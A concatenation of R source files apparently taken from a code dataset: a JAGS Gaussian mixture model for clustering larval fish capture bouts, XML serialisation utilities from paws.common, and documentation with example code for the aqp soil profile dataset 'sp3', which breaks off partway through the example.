## The covariances also of the model also show the relationship between the capture bout speed and distance to prey
## Points are assigned to the fast cluster if their posterior prob of occupying that cluster is above 0.7 (minClusterLikelyhood) (see addClusterColumns function)
library(rjags)
library(runjags)
library(ggplot2) ##install.packages("ggplot2")
library(ggExtra)## install.packages("ggExtra") ##devtools::install_github("daattali/ggExtra").
library(ggpubr) ##install.packages("ggpubr")
source("common_lib.R")
strmodel_capspeedVsDistance <- "
var x_rand[2,2];
model {
##Draw capt speed from 2d gaussian
for (i in 1:N)
{
##Draw from gaussian model as determined by mod flag
c[i,1:2] ~ dmnorm(mu[mID[i]+1,],prec[mID[i]+1, , ]) ## data in column 1 and 2
mID[i] ~ dbern(0.5) ##Se Gaussian class membership randomly
}
## ????XXXX Fit Bernouli distribution on Number of Hunt |Events that have a high-speed strike ??
## We used a normal for Probability of Strike Swim
pS ~ dnorm(sum(mID)/N,1000)T(0,1)
mStrikeCount ~ dbin(pS,N )
##Covariance matrix and its inverse -> the precision matrix
## for each Gaussian in the mixture (1 and 2)
for (g in 1:2)
{
prec[g,1:2,1:2] <- inverse(cov[g,,])
cov[g,1,1] <- sigma[g,1]*sigma[g,1]
cov[g,1,2] <- sigma[g,1]*sigma[g,2]*rho[g]
cov[g,2,1] <- cov[g,1,2]
cov[g,2,2] <- sigma[g,2]*sigma[g,2]
## Priors
sigma[g,1] ~ dunif(0,1) ##dist prey - Keep it broad within the expected limits
rho[g] ~ dunif(-1,1) ##The covar coefficient
}
## Low Speed Captcha cluster
mu[1,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey
mu[1,2] ~ dnorm(5,1)T(0,) ##cap speed
sigma[1,2] ~ dunif(0,2) ##the low cap speed sigma
## High speed Capture Cluster
mu[2,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey ##precision=1/sigma^2
mu[2,2] ~ dnorm(35,1)T(mu[1,2],) ##cap speed
sigma[2,2] ~ dunif(0,10) ##the high cap speed sigma
## Synthesize data from the distribution
x_rand[1,] ~ dmnorm(mu[1,],prec[1,,])
x_rand[2,] ~ dmnorm(mu[2,],prec[2,,])
} "
## Init datastruct that we pass to model ##
steps <- 5500
thin <- 2
chains = 3
str_vars <- c("mu","rho","sigma","cov","x_rand","mID","mStrikeCount","pS")
##load behavioural data of each group
ldata_LF <- readRDS(file=paste0("dat/huntEpisodeDataMergedWithLarvalSuccess_LF.rds") )
ldata_NF <- readRDS(file=paste0("dat/huntEpisodeDataMergedWithLarvalSuccess_NF.rds") )
ldata_DF <- readRDS(file=paste0("dat/huntEpisodeDataMergedWithLarvalSuccess_DF.rds") )
##Convert To convenient format for selecting Columns
distVsSpeed_LF <- data.frame(unlist(ldata_LF$c))
distVsSpeed_NF <- data.frame(unlist(ldata_NF$c))
distVsSpeed_DF <- data.frame(unlist(ldata_DF$c))
### RUN MODEL on Each Group independently###
jags_model_LF <- jags.model(textConnection(strmodel_capspeedVsDistance),
data = list(N=NROW(distVsSpeed_LF),
c=cbind(dist=distVsSpeed_LF$DistanceToPrey,speed=distVsSpeed_LF$CaptureSpeed)),
n.adapt = 500, n.chains = chains, quiet = F)
update(jags_model_LF, 500)
draw_LF=jags.samples(jags_model_LF,steps,thin=thin,variable.names=str_vars)
## Not Fed
jags_model_NF <- jags.model(textConnection(strmodel_capspeedVsDistance),
data = list(N=NROW(distVsSpeed_NF),
c=cbind(dist=distVsSpeed_NF$DistanceToPrey,speed=distVsSpeed_NF$CaptureSpeed)),
n.adapt = 500, n.chains = 3, quiet = F)
update(jags_model_NF)
draw_NF=jags.samples(jags_model_NF,steps,thin=2,variable.names=str_vars)
## DRY Fed
jags_model_DF <- jags.model(textConnection(strmodel_capspeedVsDistance),
data = list(N=NROW(distVsSpeed_DF),
c=cbind(dist=distVsSpeed_DF$DistanceToPrey,speed=distVsSpeed_DF$CaptureSpeed)),
n.adapt = 500, n.chains = 3, quiet = F)
update(jags_model_DF, 500)
draw_DF=jags.samples(jags_model_DF,steps,thin=2,variable.names=str_vars)
## Plot The gaussian cluster models and data coloured according to fast/slow cluster membershipt - As in Fig 4 of manuscript
plotClusteredData(distVsSpeed_NF,draw_NF)
plotClusteredData(distVsSpeed_LF,draw_LF)
plotClusteredData(distVsSpeed_DF,draw_DF)
## Extra validation plot
## Check Clustering Model and how they split the Distribution of Capture Speeds of each group##
par(mar = c(3.9,4.3,1,1))
layout(matrix(c(1,2,3),1,3, byrow = FALSE))
npchain<-3
plotCaptureSpeedFit(distVsSpeed_NF,draw_NF,1,npchain)
#title(main="Model capture Speed")
plotCaptureSpeedFit(distVsSpeed_LF,draw_LF,2,npchain)
plotCaptureSpeedFit(distVsSpeed_DF,draw_DF,3,npchain)
############### END ###
| /stat_ClusterCaptureBouts.r | permissive | dafishcode/ontogenyofhunting_pub | R | false | false | 4,965 | r | ### \author Kostas Lagogiannis 2019-04-17
## Figure 4 of manuscript - Clustering of capture bouts
## This is a mixture of two Gaussians Model for Clustering Capture speed (fast/ slow), based on Speed & Distance from Prey
## The covariances also of the model also show the relationship between the capture bout speed and distance to prey
## Points are assigned to the fast cluster if their posterior prob of occupying that cluster is above 0.7 (minClusterLikelyhood) (see addClusterColumns function)
library(rjags)
library(runjags)
library(ggplot2) ##install.packages("ggplot2")
library(ggExtra)## install.packages("ggExtra") ##devtools::install_github("daattali/ggExtra").
library(ggpubr) ##install.packages("ggpubr")
source("common_lib.R")
strmodel_capspeedVsDistance <- "
var x_rand[2,2];
model {
##Draw capt speed from 2d gaussian
for (i in 1:N)
{
##Draw from gaussian model as determined by mod flag
c[i,1:2] ~ dmnorm(mu[mID[i]+1,],prec[mID[i]+1, , ]) ## data in column 1 and 2
mID[i] ~ dbern(0.5) ##Se Gaussian class membership randomly
}
## ????XXXX Fit Bernouli distribution on Number of Hunt |Events that have a high-speed strike ??
## We used a normal for Probability of Strike Swim
pS ~ dnorm(sum(mID)/N,1000)T(0,1)
mStrikeCount ~ dbin(pS,N )
##Covariance matrix and its inverse -> the precision matrix
## for each Gaussian in the mixture (1 and 2)
for (g in 1:2)
{
prec[g,1:2,1:2] <- inverse(cov[g,,])
cov[g,1,1] <- sigma[g,1]*sigma[g,1]
cov[g,1,2] <- sigma[g,1]*sigma[g,2]*rho[g]
cov[g,2,1] <- cov[g,1,2]
cov[g,2,2] <- sigma[g,2]*sigma[g,2]
## Priors
sigma[g,1] ~ dunif(0,1) ##dist prey - Keep it broad within the expected limits
rho[g] ~ dunif(-1,1) ##The covar coefficient
}
## Low Speed Captcha cluster
mu[1,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey
mu[1,2] ~ dnorm(5,1)T(0,) ##cap speed
sigma[1,2] ~ dunif(0,2) ##the low cap speed sigma
## High speed Capture Cluster
mu[2,1] ~ dnorm(0.5,0.01)T(0.0,) ##Distance prey ##precision=1/sigma^2
mu[2,2] ~ dnorm(35,1)T(mu[1,2],) ##cap speed
sigma[2,2] ~ dunif(0,10) ##the high cap speed sigma
## Synthesize data from the distribution
x_rand[1,] ~ dmnorm(mu[1,],prec[1,,])
x_rand[2,] ~ dmnorm(mu[2,],prec[2,,])
} "
## Init datastruct that we pass to model ##
steps <- 5500
thin <- 2
chains = 3
str_vars <- c("mu","rho","sigma","cov","x_rand","mID","mStrikeCount","pS")
##load behavioural data of each group
ldata_LF <- readRDS(file=paste0("dat/huntEpisodeDataMergedWithLarvalSuccess_LF.rds") )
ldata_NF <- readRDS(file=paste0("dat/huntEpisodeDataMergedWithLarvalSuccess_NF.rds") )
ldata_DF <- readRDS(file=paste0("dat/huntEpisodeDataMergedWithLarvalSuccess_DF.rds") )
##Convert To convenient format for selecting Columns
distVsSpeed_LF <- data.frame(unlist(ldata_LF$c))
distVsSpeed_NF <- data.frame(unlist(ldata_NF$c))
distVsSpeed_DF <- data.frame(unlist(ldata_DF$c))
### RUN MODEL on Each Group independently###
jags_model_LF <- jags.model(textConnection(strmodel_capspeedVsDistance),
data = list(N=NROW(distVsSpeed_LF),
c=cbind(dist=distVsSpeed_LF$DistanceToPrey,speed=distVsSpeed_LF$CaptureSpeed)),
n.adapt = 500, n.chains = chains, quiet = F)
update(jags_model_LF, 500)
draw_LF=jags.samples(jags_model_LF,steps,thin=thin,variable.names=str_vars)
## Not Fed
jags_model_NF <- jags.model(textConnection(strmodel_capspeedVsDistance),
data = list(N=NROW(distVsSpeed_NF),
c=cbind(dist=distVsSpeed_NF$DistanceToPrey,speed=distVsSpeed_NF$CaptureSpeed)),
n.adapt = 500, n.chains = 3, quiet = F)
update(jags_model_NF)
draw_NF=jags.samples(jags_model_NF,steps,thin=2,variable.names=str_vars)
## DRY Fed
jags_model_DF <- jags.model(textConnection(strmodel_capspeedVsDistance),
data = list(N=NROW(distVsSpeed_DF),
c=cbind(dist=distVsSpeed_DF$DistanceToPrey,speed=distVsSpeed_DF$CaptureSpeed)),
n.adapt = 500, n.chains = 3, quiet = F)
update(jags_model_DF, 500)
draw_DF=jags.samples(jags_model_DF,steps,thin=2,variable.names=str_vars)
## Plot The gaussian cluster models and data coloured according to fast/slow cluster membershipt - As in Fig 4 of manuscript
plotClusteredData(distVsSpeed_NF,draw_NF)
plotClusteredData(distVsSpeed_LF,draw_LF)
plotClusteredData(distVsSpeed_DF,draw_DF)
## Extra validation plot
## Check Clustering Model and how they split the Distribution of Capture Speeds of each group##
par(mar = c(3.9,4.3,1,1))
layout(matrix(c(1,2,3),1,3, byrow = FALSE))
npchain<-3
plotCaptureSpeedFit(distVsSpeed_NF,draw_NF,1,npchain)
#title(main="Model capture Speed")
plotCaptureSpeedFit(distVsSpeed_LF,draw_LF,2,npchain)
plotCaptureSpeedFit(distVsSpeed_DF,draw_DF,3,npchain)
############### END ###
|
# Decode raw bytes XML into an R list object.
decode_xml <- function(raw) {
obj <- xml_to_list(raw_to_utf8(raw))
return(obj)
}
# Convert an XML string to an R list.
xml_to_list <- function(value) {
if (is_empty(value)) return(NULL)
result <- xml2::as_list(xml2::read_xml(value))
return(result)
}
# Convert list to XML text
list_to_xml <- function(value) {
value_xml <- xml2::as_xml_document(x = value)
value_character <- as.character(value_xml, options = "no_declaration")
value_character <- gsub("\\n$", "", value_character) # Delete trailing newline.
value_character <- gsub("\\n", "
", value_character) # Keep other newlines.
return(value_character)
}
# Add xmlns (XML namespace) attributes to all nested elements in a list.
add_xmlns <- function(xml_list, xmlns = "") {
result <- xml_list
attr(result, "xmlns") <- xmlns
if (!is.list(result)) return(result)
for (i in seq_along(result)) {
result[[i]] <- add_xmlns(result[[i]], xmlns)
}
return(result)
}
#-------------------------------------------------------------------------------
xml_build_body <- function(request) {
params <- request$params
if (is_empty(params)) {
body_xml <- ""
request$body <- body_xml
request$http_request$body <- body_xml
return(request)
}
location_name <- tag_get(params, "locationName")
xmlns <- tag_get(params, "xmlURI")
if (location_name != "") {
params <- Structure(
init = params,
.tags = list(locationName = location_name, xmlns = xmlns)
)
}
body_list <- xml_build(params)
if (length(body_list)) {
if (xmlns != "") body_list <- add_xmlns(body_list, xmlns)
body_xml <- list_to_xml(body_list)
} else {
body_xml <- ""
}
request$body <- body_xml
request$http_request$body <- body_xml
return(request)
}
xml_build <- function(params) {
location <- tag_get(params, "location")
if (location != "") return(NULL)
t <- type(params)
build_fn <- switch(
t,
structure = xml_build_structure,
list = xml_build_list,
xml_build_scalar
)
result <- build_fn(params)
return(result)
}
xml_build_structure <- function(params) {
result <- list()
for (name in names(params)) {
child <- params[[name]]
if (tag_get(child, "locationName") == "") {
child <- tag_add(child, list(locationName = name))
}
parsed <- xml_build(child)
if (!is_empty(parsed)) {
location_name <- tag_get(child, "locationName")
if (location_name == "") location_name <- name
flattened <- tag_get(child, "flattened") != ""
if (flattened) {
result <- c(result, parsed)
} else{
result[[location_name]] <- parsed
}
}
}
return(result)
}
xml_build_list <- function(params) {
if (length(params) == 0) return(list())
children <- lapply(params, function(x) xml_build(x))
location_name <- tag_get(params, "locationName")
flattened <- tag_get(params, "flattened") != ""
if (flattened) {
result <- children
names(result) <- rep(location_name, length(children))
} else {
location_name_list <- tag_get(params, "locationNameList")
if (location_name_list == "") location_name_list <- "member"
result <- children
names(result) <- rep(location_name_list, length(children))
}
return(result)
}
xml_build_scalar <- function(params) {
# Use `unlist` to avoid embedded lists in scalar nodes; `xml2::as_list`
# converts <foo>abc</foo> to `list(foo = list("abc"))`, when we want
# `list(foo = "abc")`.
data <- unlist(params)
if (length(data) == 0) return(NULL)
t <- tag_get(params, "type")
convert <- switch(
t,
blob = raw_to_base64,
boolean = convert_boolean,
double = as.numeric,
float = as.numeric,
integer = as.numeric,
long = as.numeric,
timestamp = function(x) as_timestamp(x, format = "iso8601"),
as.character
)
result <- as.list(convert(data))
return(result)
}
#-------------------------------------------------------------------------------
# Unmarshal `data` provided as a list into the shape in `interface`.
xml_unmarshal <- function(data, interface, result_name = NULL) {
if (is.null(data)) return(interface)
root <- data[[1]]
if (!is.null(result_name) && result_name %in% names(root)) {
root <- root[[result_name]]
}
result <- xml_parse(root, interface)
return(result)
}
# Unmarshal errors in `data` provided as a list.
xml_unmarshal_error <- function(data, status_code) {
root <- data[[1]]
error_response <- lapply(root$Error, unlist)
code <- error_response$Code
message <- error_response$Message
if (is.null(message) && is.null(code)) {
return(NULL)
}
error <- Error(code, message, status_code, error_response)
return(error)
}
# Convert an API response in `node` to the shape given in `interface`.
#
# e.g. convert EC2 API response
# `list(reservationSet = "foo", nextToken = "bar")`
# to output shape
# `list(Reservations = foo, NextToken = bar)`.
xml_parse <- function(node, interface) {
t <- type(interface)
parse_fn <- switch(
t,
structure = xml_parse_structure,
map = xml_parse_map,
list = xml_parse_list,
xml_parse_scalar
)
result <- parse_fn(node, interface)
return(result)
}
xml_parse_structure <- function(node, interface) {
payload <- tag_get(node, "payload")
if (length(payload) > 0 && payload != "") {
result <- xml_parse_structure(payload, interface)
return(result)
}
result <- interface
for (name in names(interface)) {
field <- interface[[name]]
# Skip fields that don't come from the response body.
if (tag_get(field, "location") != "") {
next
}
node_name <- name
flattened <- tag_get(field, "flattened") != ""
if (flattened && tag_get(field, "locationNameList") != "") {
node_name <- tag_get(field, "locationNameList")
} else if (tag_get(field, "locationName") != "") {
node_name <- tag_get(field, "locationName")
}
elem <- node[[node_name]]
if (flattened) {
elem <- node[names(node) == node_name]
}
parsed <- xml_parse(elem, field)
result[[name]] <- parsed
}
return(result)
}
xml_parse_list <- function(node, interface) {
if (length(node) == 0) return(list())
names(node) <- NULL
result <- lapply(node, function(x) xml_parse(x, interface[[1]]))
if (type(interface[[1]]) == "scalar") {
result <- unlist(result)
}
return(result)
}
xml_parse_map <- function(node, interface) {
if (length(node) == 0) return(list())
result <- list()
multiple_entries <- length(unique(names(node))) == 1
if (multiple_entries) {
children <- node
} else {
children <- list(node) # wrap singular map entry
}
for (child in children) {
parsed <- xml_parse_map_entry(child, interface)
result <- c(result, parsed)
}
return(result)
}
xml_parse_map_entry <- function(node, interface) {
key_name <- tag_get(interface, "locationNameKey")
value_name <- tag_get(interface, "locationNameValue")
if (key_name == "") key_name <- "key"
if (value_name == "") value_name <- "value"
key <- unlist(node[[key_name]])
value <- node[[value_name]]
result <- list()
result[[key]] <- xml_parse(value, interface[[1]])
return(result)
}
xml_parse_scalar <- function(node, interface) {
# Use `unlist` to avoid embedded lists in scalar nodes; `xml2::as_list`
# converts <foo>abc</foo> to `list(foo = list("abc"))`, when we want
# `list(foo = "abc")`.
data <- unlist(node)
t <- tag_get(interface, "type")
convert <- switch(
t,
blob = base64_to_raw,
boolean = as.logical,
double = as.numeric,
float = as.numeric,
integer = as.numeric,
long = as.numeric,
timestamp = function(x) as_timestamp(x, format = "iso8601"),
as.character
)
result <- convert(data)
return(result)
}
| /paws.common/R/xmlutil.R | permissive | williazo/paws | R | false | false | 7,825 | r | # Decode raw bytes XML into an R list object.
decode_xml <- function(raw) {
obj <- xml_to_list(raw_to_utf8(raw))
return(obj)
}
# Convert an XML string to an R list.
xml_to_list <- function(value) {
if (is_empty(value)) return(NULL)
result <- xml2::as_list(xml2::read_xml(value))
return(result)
}
# Convert list to XML text
list_to_xml <- function(value) {
value_xml <- xml2::as_xml_document(x = value)
value_character <- as.character(value_xml, options = "no_declaration")
value_character <- gsub("\\n$", "", value_character) # Delete trailing newline.
value_character <- gsub("\\n", "
", value_character) # Keep other newlines.
return(value_character)
}
# Add xmlns (XML namespace) attributes to all nested elements in a list.
add_xmlns <- function(xml_list, xmlns = "") {
result <- xml_list
attr(result, "xmlns") <- xmlns
if (!is.list(result)) return(result)
for (i in seq_along(result)) {
result[[i]] <- add_xmlns(result[[i]], xmlns)
}
return(result)
}
#-------------------------------------------------------------------------------
xml_build_body <- function(request) {
params <- request$params
if (is_empty(params)) {
body_xml <- ""
request$body <- body_xml
request$http_request$body <- body_xml
return(request)
}
location_name <- tag_get(params, "locationName")
xmlns <- tag_get(params, "xmlURI")
if (location_name != "") {
params <- Structure(
init = params,
.tags = list(locationName = location_name, xmlns = xmlns)
)
}
body_list <- xml_build(params)
if (length(body_list)) {
if (xmlns != "") body_list <- add_xmlns(body_list, xmlns)
body_xml <- list_to_xml(body_list)
} else {
body_xml <- ""
}
request$body <- body_xml
request$http_request$body <- body_xml
return(request)
}
xml_build <- function(params) {
location <- tag_get(params, "location")
if (location != "") return(NULL)
t <- type(params)
build_fn <- switch(
t,
structure = xml_build_structure,
list = xml_build_list,
xml_build_scalar
)
result <- build_fn(params)
return(result)
}
xml_build_structure <- function(params) {
result <- list()
for (name in names(params)) {
child <- params[[name]]
if (tag_get(child, "locationName") == "") {
child <- tag_add(child, list(locationName = name))
}
parsed <- xml_build(child)
if (!is_empty(parsed)) {
location_name <- tag_get(child, "locationName")
if (location_name == "") location_name <- name
flattened <- tag_get(child, "flattened") != ""
if (flattened) {
result <- c(result, parsed)
} else{
result[[location_name]] <- parsed
}
}
}
return(result)
}
xml_build_list <- function(params) {
if (length(params) == 0) return(list())
children <- lapply(params, function(x) xml_build(x))
location_name <- tag_get(params, "locationName")
flattened <- tag_get(params, "flattened") != ""
if (flattened) {
result <- children
names(result) <- rep(location_name, length(children))
} else {
location_name_list <- tag_get(params, "locationNameList")
if (location_name_list == "") location_name_list <- "member"
result <- children
names(result) <- rep(location_name_list, length(children))
}
return(result)
}
xml_build_scalar <- function(params) {
# Use `unlist` to avoid embedded lists in scalar nodes; `xml2::as_list`
# converts <foo>abc</foo> to `list(foo = list("abc"))`, when we want
# `list(foo = "abc")`.
data <- unlist(params)
if (length(data) == 0) return(NULL)
t <- tag_get(params, "type")
convert <- switch(
t,
blob = raw_to_base64,
boolean = convert_boolean,
double = as.numeric,
float = as.numeric,
integer = as.numeric,
long = as.numeric,
timestamp = function(x) as_timestamp(x, format = "iso8601"),
as.character
)
result <- as.list(convert(data))
return(result)
}
#-------------------------------------------------------------------------------
# Unmarshal `data` provided as a list into the shape in `interface`.
xml_unmarshal <- function(data, interface, result_name = NULL) {
if (is.null(data)) return(interface)
root <- data[[1]]
if (!is.null(result_name) && result_name %in% names(root)) {
root <- root[[result_name]]
}
result <- xml_parse(root, interface)
return(result)
}
# Unmarshal errors in `data` provided as a list.
xml_unmarshal_error <- function(data, status_code) {
root <- data[[1]]
error_response <- lapply(root$Error, unlist)
code <- error_response$Code
message <- error_response$Message
if (is.null(message) && is.null(code)) {
return(NULL)
}
error <- Error(code, message, status_code, error_response)
return(error)
}
# Convert an API response in `node` to the shape given in `interface`.
#
# e.g. convert EC2 API response
# `list(reservationSet = "foo", nextToken = "bar")`
# to output shape
# `list(Reservations = foo, NextToken = bar)`.
xml_parse <- function(node, interface) {
t <- type(interface)
parse_fn <- switch(
t,
structure = xml_parse_structure,
map = xml_parse_map,
list = xml_parse_list,
xml_parse_scalar
)
result <- parse_fn(node, interface)
return(result)
}
xml_parse_structure <- function(node, interface) {
payload <- tag_get(node, "payload")
if (length(payload) > 0 && payload != "") {
result <- xml_parse_structure(payload, interface)
return(result)
}
result <- interface
for (name in names(interface)) {
field <- interface[[name]]
# Skip fields that don't come from the response body.
if (tag_get(field, "location") != "") {
next
}
node_name <- name
flattened <- tag_get(field, "flattened") != ""
if (flattened && tag_get(field, "locationNameList") != "") {
node_name <- tag_get(field, "locationNameList")
} else if (tag_get(field, "locationName") != "") {
node_name <- tag_get(field, "locationName")
}
elem <- node[[node_name]]
if (flattened) {
elem <- node[names(node) == node_name]
}
parsed <- xml_parse(elem, field)
result[[name]] <- parsed
}
return(result)
}
xml_parse_list <- function(node, interface) {
if (length(node) == 0) return(list())
names(node) <- NULL
result <- lapply(node, function(x) xml_parse(x, interface[[1]]))
if (type(interface[[1]]) == "scalar") {
result <- unlist(result)
}
return(result)
}
xml_parse_map <- function(node, interface) {
if (length(node) == 0) return(list())
result <- list()
multiple_entries <- length(unique(names(node))) == 1
if (multiple_entries) {
children <- node
} else {
children <- list(node) # wrap singular map entry
}
for (child in children) {
parsed <- xml_parse_map_entry(child, interface)
result <- c(result, parsed)
}
return(result)
}
xml_parse_map_entry <- function(node, interface) {
key_name <- tag_get(interface, "locationNameKey")
value_name <- tag_get(interface, "locationNameValue")
if (key_name == "") key_name <- "key"
if (value_name == "") value_name <- "value"
key <- unlist(node[[key_name]])
value <- node[[value_name]]
result <- list()
result[[key]] <- xml_parse(value, interface[[1]])
return(result)
}
xml_parse_scalar <- function(node, interface) {
# Use `unlist` to avoid embedded lists in scalar nodes; `xml2::as_list`
# converts <foo>abc</foo> to `list(foo = list("abc"))`, when we want
# `list(foo = "abc")`.
data <- unlist(node)
t <- tag_get(interface, "type")
convert <- switch(
t,
blob = base64_to_raw,
boolean = as.logical,
double = as.numeric,
float = as.numeric,
integer = as.numeric,
long = as.numeric,
timestamp = function(x) as_timestamp(x, format = "iso8601"),
as.character
)
result <- convert(data)
return(result)
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/data-documentation.R
\docType{data}
\name{sp3}
\alias{sp3}
\title{Soil Profile Data Example 3}
\format{
A data frame with 46 observations on the following 15 variables.
\describe{ \item{id}{soil id} \item{top}{horizon upper
boundary (cm)} \item{bottom}{horizon lower boundary (cm)}
\item{clay}{clay content} \item{cec}{CEC by amonium acetate
at pH 7} \item{ph}{pH in 1:1 water-soil mixture}
\item{tc}{total carbon percent} \item{hue}{Munsell hue
(dry)} \item{value}{Munsell value (dry)}
\item{chroma}{Munsell chroma (dry)} \item{mid}{horizon
midpoint (cm)} \item{ln_tc}{natural log of total carbon percent}
\item{L}{color: l-coordinate, CIE-LAB colorspace (dry)}
\item{A}{color: a-coordinate, CIE-LAB colorspace (dry)}
\item{B}{color: b-coordinate, CIE-LAB colorspace (dry)}
\item{name}{horizon name} \item{soil_color}{horizon color} }
}
\description{
Soil samples from 10 soil profiles, taken from the Sierra Foothill Region of
California.
}
\details{
These data were collected to support research funded by the Kearney
Foundation of Soil Science.
}
\examples{
## this example investigates the concept of a "median profile"
# required packages
if (require(ape) & require(cluster)) {
data(sp3)
# generate a RGB version of soil colors
# and convert to HSV for aggregation
sp3$h <- NA
sp3$s <- NA
sp3$v <- NA
sp3.rgb <- with(sp3, munsell2rgb(hue, value, chroma, return_triplets = TRUE))
sp3[, c('h', 's', 'v')] <- t(with(sp3.rgb, rgb2hsv(r, g, b, maxColorValue = 1)))
# promote to SoilProfileCollection
depths(sp3) <- id ~ top + bottom
# aggregate across entire collection
a <- slab(sp3, fm = ~ clay + cec + ph + h + s + v, slab.structure = 10)
# check
str(a)
# convert back to wide format
library(data.table)
a.wide.q25 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q25'))
a.wide.q50 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q50'))
a.wide.q75 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q75'))
# add a new id for the 25th, 50th, and 75th percentile pedons
a.wide.q25$id <- 'Q25'
a.wide.q50$id <- 'Q50'
a.wide.q75$id <- 'Q75'
# combine original data with "mean profile"
vars <- c('top', 'bottom', 'id', 'clay', 'cec', 'ph', 'h', 's', 'v')
# make data.frame version of sp3
sp3.df <- as(sp3, 'data.frame')
sp3.grouped <- as.data.frame(rbind(as.data.table(horizons(sp3))[, .SD, .SDcol = vars],
a.wide.q25[, .SD, .SDcol = vars],
a.wide.q50[, .SD, .SDcol = vars],
a.wide.q75[, .SD, .SDcol = vars]))
# re-constitute the soil color from HSV triplets
# convert HSV back to standard R colors
sp3.grouped$soil_color <- with(sp3.grouped, hsv(h, s, v))
# give each horizon a name
sp3.grouped$name <- paste(
round(sp3.grouped$clay),
'/' ,
round(sp3.grouped$cec),
'/',
round(sp3.grouped$ph, 1)
)
# first promote to SoilProfileCollection
depths(sp3.grouped) <- id ~ top + bottom
plot(sp3.grouped)
## perform comparison, and convert to phylo class object
## D is rescaled to [0,]
d <- NCSP(
sp3.grouped,
vars = c('clay', 'cec', 'ph'),
maxDepth = 100,
k = 0.01
)
h <- agnes(d, method = 'ward')
p <- ladderize(as.phylo(as.hclust(h)))
# look at distance plot-- just the median profile
plot_distance_graph(d, 12)
# similarity relative to median profile (profile #12)
round(1 - (as.matrix(d)[12, ] / max(as.matrix(d)[12, ])), 2)
## make dendrogram + soil profiles
# setup plot: note that D has a scale of [0,1]
par(mar = c(1, 1, 1, 1))
p.plot <- plot(p,
cex = 0.8,
label.offset = 3,
direction = 'up',
y.lim = c(200, 0),
x.lim = c(1.25, length(sp3.grouped) + 1),
show.tip.label = FALSE)
# get the last plot geometry
lastPP <- get("last_plot.phylo", envir = .PlotPhyloEnv)
# the original labels, and new (indexed) order of pedons in dendrogram
d.labels <- attr(d, 'Labels')
new_order <- sapply(1:lastPP$Ntip,
function(i)
which(as.integer(lastPP$xx[1:lastPP$Ntip]) == i))
# plot the profiles, in the ordering defined by the dendrogram
# with a couple fudge factors to make them fit
plotSPC(
sp3.grouped,
color = "soil_color",
plot.order = new_order,
y.offset = max(lastPP$yy) + 10,
width = 0.1,
cex.names = 0.5,
add = TRUE
)
}
}
\references{
http://casoilresource.lawr.ucdavis.edu/
}
\keyword{datasets}
| /man/sp3.Rd | no_license | ncss-tech/aqp | R | false | true | 4,650 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/data-documentation.R
\docType{data}
\name{sp3}
\alias{sp3}
\title{Soil Profile Data Example 3}
\format{
A data frame with 46 observations on the following 15 variables.
\describe{ \item{id}{soil id} \item{top}{horizon upper
boundary (cm)} \item{bottom}{horizon lower boundary (cm)}
\item{clay}{clay content} \item{cec}{CEC by amonium acetate
at pH 7} \item{ph}{pH in 1:1 water-soil mixture}
\item{tc}{total carbon percent} \item{hue}{Munsell hue
(dry)} \item{value}{Munsell value (dry)}
\item{chroma}{Munsell chroma (dry)} \item{mid}{horizon
midpoint (cm)} \item{ln_tc}{natural log of total carbon percent}
\item{L}{color: l-coordinate, CIE-LAB colorspace (dry)}
\item{A}{color: a-coordinate, CIE-LAB colorspace (dry)}
\item{B}{color: b-coordinate, CIE-LAB colorspace (dry)}
\item{name}{horizon name} \item{soil_color}{horizon color} }
}
\description{
Soil samples from 10 soil profiles, taken from the Sierra Foothill Region of
California.
}
\details{
These data were collected to support research funded by the Kearney
Foundation of Soil Science.
}
\examples{
## this example investigates the concept of a "median profile"
# required packages
if (require(ape) & require(cluster)) {
data(sp3)
# generate a RGB version of soil colors
# and convert to HSV for aggregation
sp3$h <- NA
sp3$s <- NA
sp3$v <- NA
sp3.rgb <- with(sp3, munsell2rgb(hue, value, chroma, return_triplets = TRUE))
sp3[, c('h', 's', 'v')] <- t(with(sp3.rgb, rgb2hsv(r, g, b, maxColorValue = 1)))
# promote to SoilProfileCollection
depths(sp3) <- id ~ top + bottom
# aggregate across entire collection
a <- slab(sp3, fm = ~ clay + cec + ph + h + s + v, slab.structure = 10)
# check
str(a)
# convert back to wide format
library(data.table)
a.wide.q25 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q25'))
a.wide.q50 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q50'))
a.wide.q75 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q75'))
# add a new id for the 25th, 50th, and 75th percentile pedons
a.wide.q25$id <- 'Q25'
a.wide.q50$id <- 'Q50'
a.wide.q75$id <- 'Q75'
# combine original data with "mean profile"
vars <- c('top', 'bottom', 'id', 'clay', 'cec', 'ph', 'h', 's', 'v')
# make data.frame version of sp3
sp3.df <- as(sp3, 'data.frame')
sp3.grouped <- as.data.frame(rbind(as.data.table(horizons(sp3))[, .SD, .SDcol = vars],
a.wide.q25[, .SD, .SDcol = vars],
a.wide.q50[, .SD, .SDcol = vars],
a.wide.q75[, .SD, .SDcol = vars]))
# re-constitute the soil color from HSV triplets
# convert HSV back to standard R colors
sp3.grouped$soil_color <- with(sp3.grouped, hsv(h, s, v))
# give each horizon a name
sp3.grouped$name <- paste(
round(sp3.grouped$clay),
'/' ,
round(sp3.grouped$cec),
'/',
round(sp3.grouped$ph, 1)
)
# first promote to SoilProfileCollection
depths(sp3.grouped) <- id ~ top + bottom
plot(sp3.grouped)
## perform comparison, and convert to phylo class object
## D is rescaled to [0,]
d <- NCSP(
sp3.grouped,
vars = c('clay', 'cec', 'ph'),
maxDepth = 100,
k = 0.01
)
h <- agnes(d, method = 'ward')
p <- ladderize(as.phylo(as.hclust(h)))
# look at distance plot-- just the median profile
plot_distance_graph(d, 12)
# similarity relative to median profile (profile #12)
round(1 - (as.matrix(d)[12, ] / max(as.matrix(d)[12, ])), 2)
## make dendrogram + soil profiles
# setup plot: note that D has a scale of [0,1]
par(mar = c(1, 1, 1, 1))
p.plot <- plot(p,
cex = 0.8,
label.offset = 3,
direction = 'up',
y.lim = c(200, 0),
x.lim = c(1.25, length(sp3.grouped) + 1),
